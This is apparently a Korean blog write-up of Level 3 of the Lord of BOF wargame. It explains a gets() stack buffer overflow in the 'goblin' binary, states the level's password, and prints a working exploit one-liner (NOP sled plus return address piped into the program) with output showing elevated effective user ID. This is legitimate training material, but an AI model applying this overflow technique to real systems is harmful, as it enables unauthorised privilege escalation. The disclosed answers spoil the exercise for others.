반응형
LOB Level 3.
pw = 'hacking exposed'
gets 함수가 있는데, gets 함수는 BOF를 발생시키는
함수다.
일단 main+3 sub %esp,16은 esp에서 16을 빼줬다.[buf만큼 16할당]
main+6 lea %eax,[%ebp-16] eax에 ebp-16의 주소를 넣음.
main+10 call 0x804830c<gets> gets 함수를 호출. main+22
push 0x8048470 stdin과 같은 함수.
즉, buf sfp ret 쉘 코드 ebp-16 ebp ebp+4 ebp+8
gets함수에다가 파이프를 사용. 파이프는 왼쪽 명령어를 오른쪽으로 보내주는 역할.
function foo() [cobolt@localhost cobolt]$ (python -c 'print "\x90" * 20 + "\xcf\xfe\xff\xbf"' ; cat) | ./goblin id uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt) my-pass euid = 503 hackers proof
반응형
'# Related site issues > LOB' 카테고리의 다른 글
LOB Level 6. (0) | 2018.03.28 |
---|---|
LOB Level 5. (0) | 2018.03.28 |
LOB Level 4. (0) | 2018.03.27 |
LOB Level 2. (0) | 2018.03.27 |
LOB Level 1. (0) | 2018.03.27 |